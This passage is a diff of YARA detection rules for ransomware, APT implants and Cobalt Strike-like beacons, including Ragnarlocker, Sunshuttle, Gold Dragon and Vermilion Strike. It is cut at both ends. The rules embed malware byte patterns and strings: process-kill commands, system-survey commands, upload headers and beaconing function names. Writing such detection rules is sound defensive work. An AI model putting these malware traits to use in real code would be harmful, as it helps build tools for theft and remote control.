81 c4 2c 01 00 00 3b ec e8 [2] 00 00 8b e5 } - $s4 = { 8b 45 ec 8b 08 81 e1 ff ff 00 00 8b f4 51 8b 55 bc 52 ff 15 [3] 00 3b f4 e8 [2] 00 00 8b 4d f8 89 01 eb 25 8b 45 ec 8b 08 8b 55 08 8d 44 0a 02 8b f4 50 8b 4d bc 51 ff 15 [3] 00 3b f4 e8 [2] 00 00 8b 55 f8 89 02 8b 45 f8 83 c0 04 89 45 f8 8b 45 ec 83 c0 04 89 45 ec eb 8c 8b 45 c8 83 c0 14 89 45 c8 e9 25 ff ff ff 5f 5e 5b 81 c4 08 01 00 00 3b ec e8 [2] 00 00 8b e5 } + $s1 = { 00 ?? 19 00 00 00 48 85 c0 [2-6] bf 0a 00 00 00 e8 [2] 01 00 ?? 24 00 00 00 48 85 c0 [2-6] c6 00 48 c6 40 05 49 c6 40 01 49 c6 40 06 4c c6 40 02 53 c6 40 07 45 c6 40 03 54 c6 40 08 3d c6 40 04 46 c6 40 09 00 48 89 c7 e8 [2] 00 00 48 8d 54 24 0c } + $s2 = "GETCONF_DIR" ascii + $s3 = "/var/run/nscd/so/dev/ptmx" ascii + $s4 = { 45 78 65 63 53 74 61 72 74 3d 2f 62 69 6e 2f 62 61 73 68 20 2d 63 20 2f 75 73 72 2f 62 69 6e 2f 62 69 6f 73 65 74 64 } + $s5 = { 48 89 df e8 [3] ff 31 f6 48 89 df e8 [3] ff 48 8d 58 01 48 } + $s6 = { 2f 76 61 72 2f 74 6d 70 00 2f 76 61 72 2f 70 72 6f 66 69 6c 65 } condition: - uint16(0)==0x5a4d and filesize >100KB and filesize <900KB and all of ($s*) + uint32(0)==0x464C457F and filesize >100KB and 5 of ($s*) } -import "pe" - -rule ARKBIRD_SOLG_Ransom_Ragnarlocker_July_2020_1 : FILE +rule ARKBIRD_SOLG_APT_Kimsuky_Aug_2020_1 : FILE { meta: - description = "Detect Ragnarlocker by strings (July 2020)" + description = "Detect Gold Dragon used by Kimsuky APT group" author = "Arkbird_SOLG" - id = "9291ed33-8d7d-5b88-9075-b847fdbab179" - date = "2020-07-30" - modified = "2020-07-30" - reference = "https://twitter.com/JAMESWT_MHT/status/1288797666688851969" - source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2020-07-30/Yara_Ransom_Ragnarlocker_July_2020_1.yar#L3-L34" + id = "dd79aa3b-0bbc-5fdd-808e-c2dee6d89804" + date = "2020-08-31" + modified = "2020-09-14" + reference = "Internal Research" + source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2020-09-14/Kimsuky/APT_Kimsuky_Aug_2020_1.yar#L1-L23" license_url = "N/A" - logic_hash = "73d3be9a2d3b315ed6d3d93e2c6f9988d60234530b0398e8949c511f919a8954" + logic_hash = "4644ea81535c867a36a882bb270cea784ae135e7acc7078823be0579b1746932" score = 75 - quality = 23 + quality = 75 tags = "FILE" - hash1 = "04c9cc0d1577d5ee54a4e2d4dd12f17011d13703cdd0e6efd46718d14fd9aa87" + hash1 = "4ff2a67b094bcc56df1aec016191465be4e7de348360fd307d1929dc9cbab39f" + hash2 = "97935fb0b5545a44e136ee07df38e9ad4f151c81f5753de4b59a92265ac14448" strings: - $f1 = "bootfont.bin" fullword wide - $f2 = "bootmgr.efi" fullword wide - $f3 = "bootsect.bak" fullword wide - $r1 = "$!.txt" fullword wide - $r2 = "---BEGIN KEY R_R---" fullword ascii - $r3 = "!$R4GN4R_" fullword wide - $r4 = "RAGNRPW" fullword ascii - $r5 = "---END KEY R_R---" fullword ascii - $a1 = "+RhRR!-uD8'O&Wjq1_P#Rw<9Oy?n^qSP6N{BngxNK!:TG*}\\|W]o?/]H*8z;26X0" fullword ascii - $a2 = "\\\\.\\PHYSICALDRIVE%d" fullword wide - $a3 = "WinSta0\\Default" fullword wide - $a4 = "%s-%s-%s-%s-%s" fullword wide - $a5 = "SOFTWARE\\Microsoft\\Cryptography" fullword wide - $c1 = "-backup" fullword wide - $c2 = "-force" fullword wide - $c3 = "-vmback" fullword wide - $c4 = "-list" fullword wide - $s1 = ".ragn@r_" fullword wide - $s2 = "\\notepad.exe" fullword wide - $s3 = "Opera Software" fullword wide - $s4 = "Tor browser" fullword wide + $s1 = "/c systeminfo >> %s" fullword ascii + $s2 = "/c dir %s\\ >> %s" fullword ascii + $s3 = ".?AVGen3@@" fullword ascii + $s4 = { 48 6f 73 74 3a 20 25 73 0d 0a 52 65 66 65 72 65 72 3a 20 68 74 74 70 3a 2f 2f 25 73 25 73 0d 0a 25 73 0d 0a 25 73 } + $s5 = "%s?filename=%s" fullword ascii + $s6 = "Content-Disposition: form-data; name=\"userfile\"; filename=\"" fullword ascii + $s7 = "Content-Type: multipart/form-data; boundary=----WebKitFormBoundarywhpFxMBe19cSjFnG" fullword ascii + $s8 = "Content-Disposition: form-data; name=\"MAX_FILE_SIZE\"" fullword ascii + $s9 = "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; .NET CLR 1.1.4322)" fullword ascii + $s10 = "\\Microsoft\\HNC" fullword ascii + $s11 = "Mozilla/5.0" fullword ascii condition: - uint16(0)==0x5a4d and filesize <30KB and (pe.imphash()=="2c2aab89a4cba444cf2729e2ed61ed4f" and ((2 of ($f*)) and (3 of ($r*)) and (4 of ($a*)) and (2 of ($c*)) and (2 of ($s*)))) + uint16(0)==0x5a4d and filesize >150KB and 8 of them } -rule ARKBIRD_SOLG_EXP_CVE_2021_1647_Apr_2021_1 : CVE_2021_1647 FILE +rule ARKBIRD_SOLG_MAL_ELF_Vermilion_Strike_Sep_2021_1 : FILE { meta: - description = "Detect CVE-2021-1647 tool " + description = "Detect the ELF version of Vermilion Strike implant" author = "Arkbird_SOLG" - id = "c4c14d22-adf8-51b1-b898-7e253447824f" - date = "2021-05-04" - modified = "2021-05-05" - reference = "-" - source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-05-04/CVE-2021-1647/EXP_CVE_2021_1647_Apr_2021_1.yara#L1-L18" + id = "bfc498b6-4d3d-5ae9-a360-d31f8cf6c5fc" + date = "2021-09-14" + modified = "2021-09-16" + reference = "https://www.intezer.com/blog/malware-analysis/vermilionstrike-reimplementation-cobaltstrike/" + source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-09-15/Vermilion_Strike/MAL_ELF_Vermilion_Strike_Sep_2021_1.yara#L1-L19" license_url = "N/A" - logic_hash = "58f16973f68b1b792f6f1575b6a3f386493d033767ee97e48a33044e3ddc3426" - score = 75 + logic_hash = "fe4bb6da7b29f1ae7c25a657d27f5e60ffa0e7d9f1f09a5a2331e4a80eb79481" + score = 50 quality = 75 - tags = "CVE-2021-1647, FILE" - hash1 = "6e1e9fa0334d8f1f5d0e3a160ba65441f0656d1f1c99f8a9f1ae4b1b1bf7d788" - hash2 = "9eaea8a56c47524f6d6b2e2bb72d035c1aa782a4f069ef9df92a0af5c6ee612b" - hash3 = "db0e53c9db41d4de21f4bbf1f60d977f5d935239d3fce8b902e8ef0082796cc7" - hash4 = "24d9ff44affea06435829507e8e6cb4b659468aa2af510031ed963caf5a6d77a" - tlp = "Green" - adversary = "-" + tags = "FILE" + hash1 = "294b8db1f2702b60fb2e42fdc50c2cee6a5046112da9a5703a548a4fa50477bc" + level = "experimental" + tlp = "White" + adversary = "Vermilion Strike" strings: - $seq1 = { 83 7d ec 01 0f 8e fe 76 ff ff 83 45 f4 01 83 7d f4 01 0f 8e e4 76 ff ff 8b 45 e4 89 04 24 e8 12 74 ff ff 83 ec 04 a1 [2] 01 b1 85 c0 75 0e 8b 45 e4 89 04 24 e8 fb 73 ff ff 83 ec 04 a1 28 ?? 01 b1 c7 44 24 04 00 00 00 00 c7 04 24 00 00 00 00 ff d0 83 ec 08 b8 00 00 00 00 c9 c2 04 00 55 89 e5 83 ec 10 c7 45 f4 00 ?? 01 70 8b 45 08 83 e8 01 a3 70 ?? 01 b1 c7 05 74 ?? 01 b1 00 00 00 00 c7 05 a0 ?? 02 b1 00 00 00 00 8b 15 70 ?? 01 b1 a1 74 ?? 01 b1 01 d0 83 e0 fe 89 c2 a1 [2] 01 b1 29 c2 89 d0 25 ff 0f 00 00 a3 5c ?? 01 b1 a1 74 ?? 01 b1 a3 a0 ?? 02 b1 8b 15 70 ?? 01 b1 a1 74 ?? 01 b1 01 d0 d1 e8 83 c0 01 a3 74 ?? 01 b1 8b 15 70 ?? 01 b1 a1 74 ?? 01 b1 01 d0 83 e0 fe 89 c2 a1 [2] 01 b1 29 c2 89 d0 25 ff 0f 00 00 a3 5c ?? 01 b1 a1 74 ?? 01 b1 a3 a0 ?? 02 b1 8b 15 70 ?? 01 b1 a1 74 ?? 01 b1 01 d0 d1 e8 83 c0 01 a3 74 ?? 01 b1 8b 15 70 ?? 01 b1 a1 74 ?? 01 b1 01 d0 83 e0 fe 89 c2 a1 [2] 01 b1 29 c2 89 d0 25 ff 0f 00 00 a3 5c ?? 01 b1 a1 74 ?? 01 b1 a3 a0 ?? 02 b1 8b 15 70 ?? 01 b1 a1 74 ?? 01 b1 01 d0 d1 e8 83 c0 01 a3 74 ?? 01 b1 8b 15 70 ?? 01 b1 a1 74 ?? 01 b1 01 d0 83 e0 fe 89 c2 a1 [2] 01 b1 29 c2 89 } - $seq2 = { a1 74 ?? 01 b1 83 e8 01 83 e0 01 85 c0 74 0e 8b 15 5c ?? 01 b1 8b 45 f4 01 d0 89 45 fc 8b 15 70 ?? 01 b1 a1 74 ?? 01 b1 01 d0 83 e0 fe 89 c2 a1 [2] 01 b1 29 c2 89 d0 25 ff 0f 00 00 a3 5c ?? 01 b1 a1 74 ?? 01 b1 a3 a0 ?? 02 b1 8b 15 70 ?? 01 b1 a1 74 ?? 01 b1 01 d0 d1 e8 83 c0 01 a3 74 ?? 01 b1 83 7d 0c 00 74 1d a1 74 ?? 01 b1 83 e8 01 83 e0 01 85 c0 74 0e 8b 15 5c ?? 01 b1 8b 45 f4 01 d0 89 45 fc 8b 15 70 ?? 01 b1 a1 74 ?? 01 b1 01 d0 83 e0 fe 89 c2 a1 [2] 01 b1 29 c2 89 d0 25 ff 0f 00 00 a3 5c ?? 01 b1 a1 74 ?? 01 b1 a3 a0 ?? 02 b1 8b 15 70 ?? 01 b1 a1 74 ?? 01 b1 01 d0 d1 e8 83 c0 01 a3 74 ?? 01 b1 83 7d 0c 00 74 1d a1 74 ?? 01 b1 83 e8 01 83 e0 01 85 c0 74 0e 8b 15 5c ?? 01 b1 8b 45 f4 01 d0 89 45 fc 8b 15 70 ?? 01 b1 a1 74 ?? 01 b1 01 d0 83 e0 fe 89 c2 a1 [2] 01 b1 29 c2 89 d0 25 ff 0f 00 00 a3 5c ?? 01 b1 a1 74 ?? 01 b1 a3 a0 ?? 02 b1 8b 15 70 ?? 01 b1 a1 74 ?? 01 b1 01 d0 d1 e8 83 c0 01 a3 74 ?? 01 b1 83 7d 0c 00 75 0e 8b 15 5c ?? 01 b1 8b 45 f4 01 d0 89 45 fc c7 45 f8 00 00 00 00 eb 19 8b 45 f8 05 e2 ff ff 7f 8d 14 00 8b 45 fc 01 d0 66 c7 00 01 00 83 45 f8 01 83 7d f8 3b 7e e1 8b 45 fc } + $s1 = { be bd f8 40 00 41 55 49 89 fd bf a3 f8 40 00 41 54 55 53 48 81 ec 20 04 00 00 e8 4f cb ff ff 48 85 c0 48 89 c5 0f 84 af 01 00 00 48 8d 5c 24 20 41 bc 0a 00 00 00 41 be b0 32 40 00 66 90 48 89 ea be c8 00 00 00 48 89 df e8 30 cd ff ff 48 85 c0 0f 84 4f 01 00 00 80 7c 24 20 23 74 e0 bf b4 f8 40 00 48 89 de 4c 89 e1 f3 a6 75 d1 be d4 1d 41 } + $s2 = { 8b 43 14 8b 73 10 8b 4b 0c 8d 56 01 44 8d 80 6c 07 00 00 be 70 21 41 00 31 c0 e8 ed 34 ff ff 48 85 ed 74 28 8b 4b 04 8b 53 08 48 89 ef 44 8b 03 48 83 c4 08 be 79 21 41 00 5b 5d } + $s3 = { 55 53 48 83 ec 70 48 8d 44 24 30 48 89 44 24 10 48 8d 44 24 40 48 89 44 24 08 8b 84 24 90 00 00 00 89 04 24 e8 22 fb ff ff e8 fd 58 ff ff e8 38 5a ff ff e8 f3 59 ff ff 0f 1f 00 e8 5b 5e ff ff 48 89 c7 e8 23 5b ff ff 48 89 c7 48 89 c5 e8 18 5f ff ff 48 8d 4c 24 50 31 d2 be 6e 00 00 00 48 89 c7 48 89 c3 e8 41 59 ff ff 48 8b 7c 24 50 31 c9 ba 04 00 00 00 be 21 00 00 00 e8 1b 60 ff ff 48 8d 54 24 2f 48 8d 7c 24 60 4c 89 e6 e8 d9 5c ff ff 48 8d 7c 24 60 ba 88 f8 40 00 be a7 20 41 00 e8 a5 1f 00 00 48 8b 4c 24 60 31 d2 be 64 00 00 00 48 89 df e8 f1 58 ff ff 31 c9 31 d2 be 65 00 00 00 48 89 df e8 e0 58 ff ff 48 85 c0 7e 73 48 8b 7c 24 50 e8 41 58 ff ff 8b 54 24 30 48 8b 74 24 40 48 89 df e8 50 59 ff ff 48 8b 7c 24 40 e8 66 12 00 00 48 8b 94 24 a0 00 00 00 48 8b b4 24 98 00 00 00 48 89 df e8 0e fd ff ff 48 89 df e8 b6 5f ff ff 48 89 ef e8 ce 58 ff ff b8 01 00 00 00 48 8b 54 24 60 48 8d 7a e8 48 81 ff c0 54 61 00 75 23 48 83 c4 70 5b 5d 41 5c c3 66 0f 1f 44 00 00 48 89 df e8 80 5f ff ff 48 89 ef e8 98 58 ff ff 31 c0 eb cb be b0 32 40 00 48 8d 4f 10 48 85 f6 74 3d 83 ca ff } + $s4 = { 8b 15 6e e4 20 00 31 ff be e0 57 61 00 e8 0a b8 ff ff 48 89 c7 31 c0 48 85 ff 74 17 48 89 3d e9 e4 20 00 e8 a4 bf ff ff 89 05 e6 e4 20 00 b8 01 00 } + $s5 = { b8 02 00 00 00 48 89 fb 48 83 ec 10 66 89 04 25 00 00 00 00 e8 a6 4e ff ff 83 f8 ff 89 04 24 74 16 89 04 25 04 00 00 00 b8 01 00 00 00 48 83 c4 10 5b c3 0f 1f 40 00 48 89 df e8 f0 4e ff ff 48 89 c1 31 c0 48 85 } condition: - filesize >10KB and all of them + uint32(0)==0x464c457f and filesize >30KB and 4 of them } -rule ARKBIRD_SOLG_APT_UNC2452_Sunshuttle_Mar_2021_1 : FILE +rule ARKBIRD_SOLG_MAL_Stager_Vermilion_Strike_Sep_2021_1 : FILE { meta: - description = "Detect Sunshuttle implant used by UNC2452 group" + description = "Detect the windows version of the stager of Vermilion Strike implant" author = "Arkbird_SOLG" - id = "faa07d19-4c61-554d-a6b1-ab7cb0919ec0" - date = "2021-03-06" - modified = "2021-03-06" - reference = "https://twitter.com/Arkbird_SOLG/status/1367570764468224010" - source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-03-06/UNC2452/APT_UNC2452_sunshuttle_Mar_2021_1.yar#L1-L31" + id = "7a8ae258-1fb4-5a24-b69e-3a632e00bfae" + date = "2021-09-14" + modified = "2021-09-16" + reference = "https://www.intezer.com/blog/malware-analysis/vermilionstrike-reimplementation-cobaltstrike/" + source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-09-15/Vermilion_Strike/MAL_Stager_Vermilion_Strike_Sep_2021_1.yara#L1-L18" license_url = "N/A" - logic_hash = "368487f1716aaa5c10e19a428649d6706b3f45c53853e6729752dc41fc97bc38" - score = 75 - quality = 63 + logic_hash = "cc4d59c92faba1f3435c8454071a1e1c60b6339393796c76e64b890bb85d13cc" + score = 50 + quality = 75 tags = "FILE" - hash1 = "611458206837560511cb007ab5eeb57047025c2edc0643184561a6bf451e8c2c" - hash2 = "b9a2c986b6ad1eb4cfb0303baede906936fe96396f3cf490b0984a4798d741d8" - hash3 = "bbd16685917b9b35c7480d5711193c1cd0e4e7ccb0f2bf1fd584c0aebca5ae4c" + hash1 = "3ad119d4f2f1d8ce3851181120a292f41189e4417ad20a6c86b6f45f6a9fbcfc" + level = "experimental" + tlp = "White" + adversary = "Vermilion Strike" strings: - $s1 = { 47 6f 20 62 75 69 6c 64 20 49 44 3a 20 22 39 59 72 42 6a 6b 6b 58 46 79 6b 62 47 51 72 6d 56 32 4b 49 2f 41 48 44 69 7a 57 51 61 4d 38 47 38 4a 37 6b 56 4b 32 56 65 2f 46 55 74 5f 6b 6b 53 56 6c 78 32 36 49 6e 46 56 61 79 70 77 2f 6c 75 5a 41 54 35 55 6e 55 69 34 64 4a 65 6b 6e 73 6b 55 6e 22 } - $s2 = { 47 6f 20 62 75 69 6c 64 20 49 44 3a 20 22 71 6f 66 49 6b 76 62 6c 73 31 69 72 4f 36 78 68 6a 41 63 5a 2f 6a 49 69 71 41 70 70 31 56 6f 39 72 4f 53 2d 44 6a 65 4e 75 2f 62 50 75 6e 33 4e 35 74 49 42 58 4b 50 74 4e 79 73 48 4f 51 2f 41 52 53 72 63 65 6b 35 68 51 47 38 59 49 56 6e 4d 75 37 54 22 } - $s3 = { 6f 73 2f 65 78 65 63 2e 28 2a 43 6d 64 29 2e 52 75 6e } - $s4 = "main.request_session_key" fullword ascii - $s5 = "main.wget_file" fullword ascii - $s6 = "main.GetMD5Hash" fullword ascii - $s7 = "main.beaconing" fullword ascii - $s8 = "main.resolve_command" fullword ascii - $s9 = "main.send_file_part" fullword ascii - $s10 = "main.retrieve_session_key" fullword ascii - $s11 = "main.send_command_result" fullword ascii - $s12 = { 63 38 3a 32 37 3a 63 63 3a 63 32 3a 33 37 3a 35 61 } - $s13 = { 2d 2d 2d 2d 2d 42 45 47 49 4e } - $s14 = { 2d 2d 2d 2d 2d 45 4e 44 } + $s1 = { a1 b0 62 41 00 33 c4 50 8d 84 24 d0 00 00 00 64 a3 00 00 00 00 8b da 8b 84 24 ec 00 00 00 8b b4 24 e0 00 00 00 8b bc 24 e4 00 00 00 8b ac 24 e8 00 00 00 8d 54 24 2c 52 89 44 24 28 89 4c 24 2c e8 95 f0 ff ff 33 c0 89 84 24 d8 00 00 00 c7 84 24 88 00 00 00 0f 00 00 00 89 84 24 84 00 00 00 88 44 24 74 6a 17 68 fc 3b 41 00 8d 44 24 78 c6 84 24 e0 00 00 00 01 e8 9e 0b 00 00 6a 02 68 14 3c 41 00 8d 44 24 78 e8 8e 0b 00 00 6a 00 6a 00 6a 00 6a 01 55 ff 15 44 21 41 00 8b e8 55 6a 02 57 53 8b ce 89 6c 24 2c e8 8d fc ff ff 83 c4 10 6a 00 6a 00 6a 03 6a 00 6a 00 53 56 55 ff 15 58 21 41 00 6a 00 68 00 82 80 80 6a 00 6a 00 6a 00 57 68 f8 3b 41 00 50 89 44 24 40 ff 15 4c 21 41 00 } + $s2 = { 64 a1 00 00 00 00 50 83 ec 60 a1 b0 62 41 00 33 c4 89 44 24 58 53 55 56 57 a1 b0 62 41 00 33 c4 50 8d 44 24 74 64 a3 00 00 00 00 8b 84 24 88 00 00 00 8b ac 24 84 00 00 00 8b f9 89 44 24 18 33 c0 8d 4c 24 1c 51 8b f2 33 db 89 44 24 30 89 44 24 34 89 44 24 38 89 44 24 3c 89 44 24 40 89 44 24 44 89 44 24 48 89 44 24 4c 89 44 24 50 89 44 24 20 89 44 24 24 89 44 24 28 89 44 24 2c ff 15 2c 21 41 00 85 c0 74 21 39 5c 24 1c 74 05 bb 01 00 00 00 8b 44 24 20 } + $s3 = { 50 56 8d 4c 24 58 e8 fc f2 ff ff 6a 01 8d 54 24 18 52 8d 44 24 58 50 89 9c 24 88 00 00 00 33 c0 c6 44 24 20 3d e8 0d 01 00 00 83 f8 ff 74 4f 80 bc 24 8c 00 00 00 00 74 16 56 bb 18 3c 41 00 8d 7c 24 54 e8 8f fd ff ff 83 c4 04 84 c0 75 2f 56 bb 20 3c 41 00 8d 7c 24 54 e8 79 fd ff ff 83 c4 04 84 c0 75 19 56 bb 28 3c 41 00 e8 67 fd ff ff 83 c4 04 84 c0 74 07 c7 45 00 04 00 00 00 83 7c 24 68 10 72 19 } + $s4 = { 8d 44 24 18 50 8d 4c 24 18 51 6a 1f 53 c7 44 24 28 04 00 00 00 ff 15 3c 21 41 00 81 4c 24 14 00 01 00 00 6a 04 8d 54 24 18 52 6a 1f 53 } condition: - uint16(0)==0x5a4d and filesize >800KB and 12 of them + uint16(0)==0x5A4D and filesize >30KB and 3 of them } -rule ARKBIRD_SOLG_APT_Unknown_Middle_East_Feb_2020_1 : FILE +rule ARKBIRD_SOLG_MAL_Beacon_Vermilion_Strike_Sep_2021_1 : FILE { meta: - description = "Dectect unknown Middle East implants (retrohunt June 2020)" + description = "Detect the windows version of the beacon of Vermilion Strike implant" author = "Arkbird_SOLG" - id = "e45675e6-29d5-587b-943e-19450772a092" - date = "2021-03-05" - modified = "2021-03-06" - reference = "internal Research" - source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-03-06/Unknown/APT_Unknown_Middle_East_Feb_2020_1.yar#L1-L24" + id = "61bb0f02-0eb3-5abe-a2fc-65b94a9486f7" + date = "2021-09-14" + modified = "2021-09-16" + reference = "https://www.intezer.com/blog/malware-analysis/vermilionstrike-reimplementation-cobaltstrike/" + source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-09-15/Vermilion_Strike/MAL_Beacon_Vermilion_Strike_Sep_2021_1.yara#L1-L20" license_url = "N/A" - logic_hash = "64cdac73bc3e29e8716cb24ae6577f853b2cf31303d129a0ec38ba89b7ff5351" + logic_hash = "801d93fc250666a48fbdd504c8bacab74f0bf7f534a7301a20ad79df3b41750d" score = 75 quality = 75 tags = "FILE" - hash1 = "274beb57ae19cbc5c2027e08cb2b718dea7ed1acb21bd329d5aba33231fb699d" - hash2 = "3a4ef9b7bd7f61c75501262e8b9e31f9e9bc3a841d5de33dcdeb8aaa65e95f76" + hash1 = "c49631db0b2e41125ccade68a0fe7fb70939315f1c580510e40e5b30ead868f5" + hash2 = "07b815cee2b85a41820cd8157a68f35aa1ed0aa5f4093b8cb79a1d645a16273f" + hash3 = "7129434afc1fec276525acfeee5bb08923ccd9b32269638a54c7b452f5493492" + tlp = "White" + adversary = "Vermilion Strike" strings: - $seq1 = { 55 8b ec 83 e4 f8 81 ec 08 04 00 00 a1 34 45 49 00 33 c4 89 84 24 04 04 00 00 83 ec 08 ba [2] 48 00 b9 ?? 82 48 00 68 [2] 48 00 e8 af 9f ff ff 83 c4 04 ba [2] 48 00 b9 ?? 82 48 00 68 [2] 48 00 e8 98 9f ff ff 83 c4 04 ba [2] 48 00 b9 ?? 82 48 00 68 [2] 48 00 e8 81 9f ff ff 83 c4 0c 8d 04 24 68 00 04 00 00 6a 00 50 e8 [2] 01 00 83 c4 0c 8d 04 24 [4] 00 68 00 02 00 00 50 e8 [2] 02 00 83 c4 0c 8d 04 24 68 ?? ab 49 00 68 00 02 00 00 50 e8 [2] 02 00 83 c4 0c 8d 04 24 68 ?? 6c 48 00 68 00 02 00 00 50 e8 [2] 02 00 83 c4 0c 8d 04 24 68 ?? a9 49 00 68 00 02 00 00 50 e8 [2] 02 00 83 c4 0c 8d 04 24 68 ?? 83 48 00 68 00 02 00 00 50 e8 [2] 02 00 83 c4 0c 33 c0 66 89 84 24 fe 03 00 00 8d 04 24 68 [2] 48 00 68 00 02 00 00 50 e8 [2] 02 00 83 c4 0c 8d 04 24 68 ?? a6 49 00 68 00 02 00 00 50 e8 [2] 02 00 83 c4 0c 8d 04 24 68 ?? 83 48 00 68 00 02 00 00 50 e8 [2] 02 00 8d 4c 24 0c e8 6b a1 ff ff 83 c4 04 ba [2] 48 00 b9 ?? 83 48 00 68 [2] 48 00 e8 94 9e ff ff 8b 8c 24 10 04 00 00 83 c4 0c 33 cc e8 [2] 01 00 8b e5 5d } - $seq2 = { 55 8b ec 6a ff 68 [2] 47 00 64 a1 00 00 00 00 50 81 ec d8 00 00 00 a1 34 45 49 00 33 c5 89 45 f0 56 57 50 8d 45 f4 64 a3 00 00 00 00 8b 45 08 8b 75 14 c7 45 fc 00 00 00 00 89 85 34 ff ff ff 89 85 40 ff ff ff 33 c0 50 50 50 50 c7 85 3c ff ff ff 00 00 00 00 68 ?? 70 48 00 89 b5 6c ff ff ff c7 85 48 ff ff ff 00 00 00 00 c7 85 44 ff ff ff 00 00 00 00 89 85 50 ff ff ff ff 15 78 55 47 00 89 85 38 ff ff ff 85 c0 74 3f 6a 00 68 bb 01 00 00 68 ?? 6d 48 00 50 ff 15 8c 55 47 00 89 85 44 ff ff ff 85 c0 74 22 68 00 00 80 00 6a 00 6a 00 6a 00 68 ?? 71 48 00 68 ?? 6d 48 00 50 ff 15 90 55 47 00 89 85 50 ff ff ff 8b 3d 44 53 47 00 6a 00 6a 00 6a 00 6a 00 6a ff 56 6a 00 68 e9 fd 00 00 ff d7 8b f0 56 e8 ?? 35 01 00 83 c4 04 89 85 4c ff ff ff 6a 00 6a 00 56 50 6a ff ff b5 6c ff ff ff 6a 00 68 e9 fd 00 00 ff d7 68 80 00 00 00 8b f8 8d 85 70 ff ff ff 6a 00 50 e8 [2] 02 00 57 8d 85 70 ff ff ff 68 ?? 79 48 00 50 e8 ?? a3 00 00 83 c4 18 c7 85 64 ff ff ff 00 00 00 00 33 c0 c7 85 68 ff ff ff 07 00 00 00 8d 8d 54 ff ff ff 66 89 85 54 ff ff ff 6a 10 68 [2] 48 00 e8 ?? 84 00 00 8d 8d 70 ff ff ff c7 45 fc 01 00 00 00 8d 51 02 66 8b 01 83 c1 02 66 85 c0 75 f5 2b ca 8d 85 70 ff ff ff d1 f9 51 50 8d 8d 54 ff ff ff e8 89 63 00 00 6a 33 68 ?? 71 48 00 8d 8d 54 ff ff ff e8 77 63 00 00 8b b5 50 ff ff ff 85 f6 } - $s1 = "taskkill /im svehost.exe /t /f" fullword ascii - $s2 = "\\AppData\\Windows\\svehost.exe" fullword ascii - $s3 = "svehost.exe" fullword wide - $s4 = "bdagent.exe" fullword wide - $s5 = "taskkill /im keepass.exe /t /f" fullword ascii - $s6 = "%s\\AppData\\Windows\\svehost" fullword ascii - $s7 = "\\AppData\\Roaming\\ViberPc" fullword wide - $s8 = "\\AppData\\Roaming\\Skype" fullword wide + $s1 = { 50 c7 03 01 00 00 00 e8 cc ?? 00 00 89 43 04 83 f8 ff 74 2c 8b 4d 08 6a 00 8d 44 24 0c 50 53 6a 08 6a 01 51 e8 91 ?? 00 00 85 c0 75 13 8b 44 24 08 66 83 78 08 01 6a 01 50 74 38 e8 80 ?? 00 00 8b 4e 10 2b 4e 0c b8 93 24 49 92 f7 e9 03 d1 c1 fa 04 8b c2 c1 e8 1f 47 03 c2 3b f8 0f 8c 30 ff ff ff 53 ff 15 } + $s2 = { 8b 4c 24 1c 6a 00 6a 00 6a 00 6a 01 51 ff 15 5c a2 02 10 8b 55 0c 8b f0 56 6a 02 53 52 8b cf 89 74 24 34 e8 f0 fb ff ff 8b 45 0c 83 c4 10 6a 00 6a 00 6a 03 6a 00 6a 00 50 57 56 ff 15 50 a2 02 10 8b 4c 24 30 6a 00 68 00 82 80 80 6a 00 6a 00 6a 00 53 51 50 89 44 24 3c ff 15 64 a2 02 10 8b f8 89 7c 24 14 8d 49 00 8b b4 24 90 00 00 00 8b 5c 24 7c 8b c3 83 fe 10 73 04 8d 44 24 7c 8d 50 01 8d a4 24 00 00 00 00 8a 08 40 84 c9 75 f9 2b c2 8b cb 83 fe 10 73 04 8d 4c 24 7c 8b 55 20 52 8b 54 24 2c 52 50 51 57 ff 15 4c a2 02 10 85 } + $s3 = { 68 00 00 00 10 6a 00 6a 00 6a 00 6a 00 c7 44 24 60 01 00 00 00 ff 15 40 a2 02 10 8b d8 8d 54 24 2c 52 8d 44 24 3c 50 55 53 ff 15 38 a2 02 10 8b e8 85 db 74 07 53 ff 15 44 a2 02 10 85 ed 74 2f 8b } + $s4 = { 6a ff 68 [2] 02 10 64 a1 00 00 00 00 50 81 ec 14 01 00 00 a1 c0 72 03 10 33 c4 89 84 24 10 01 00 00 53 a1 c0 72 03 10 33 c4 50 8d 84 24 1c 01 00 00 64 a3 00 00 00 00 33 db 8d 44 24 0c 89 9c 24 24 01 00 00 50 8d 4c 24 18 89 5c 24 0c 51 89 74 24 18 c7 44 24 14 04 01 00 00 ff 15 04 a0 02 10 8d 44 24 14 c7 46 18 0f 00 00 00 89 5e 14 88 5e 04 8d 50 01 8a 08 40 3a cb 75 f9 2b c2 50 8d 54 24 18 52 8b ce e8 [2] ff ff 89 9c 24 24 01 00 00 c7 44 24 08 01 00 00 00 e8 d1 fe ff ff 85 c0 8b c6 74 0e 6a 02 68 ?? c6 02 10 e8 [2] ff ff 8b c6 8b 8c 24 1c 01 00 00 64 89 0d 00 00 00 00 59 5b 8b 8c 24 } + $s5 = { a1 c0 72 03 10 33 c4 89 44 24 2c 68 00 00 00 f0 6a 18 6a 00 6a 00 68 4c 97 03 10 ff 15 30 a0 02 10 85 c0 75 11 33 c0 8b 4c 24 2c 33 cc e8 [2] 00 00 83 c4 30 c3 8b 15 58 97 03 10 8b 0d 54 97 03 10 68 50 97 03 10 6a 00 33 c0 6a 00 66 89 44 24 1e a1 5c 97 03 10 89 54 24 2c 6a 1c 8d 54 24 20 89 44 24 34 a1 4c 97 03 10 89 4c 24 2c 8b 0d 60 97 03 10 52 50 c6 44 24 28 08 c6 44 24 29 02 c7 44 24 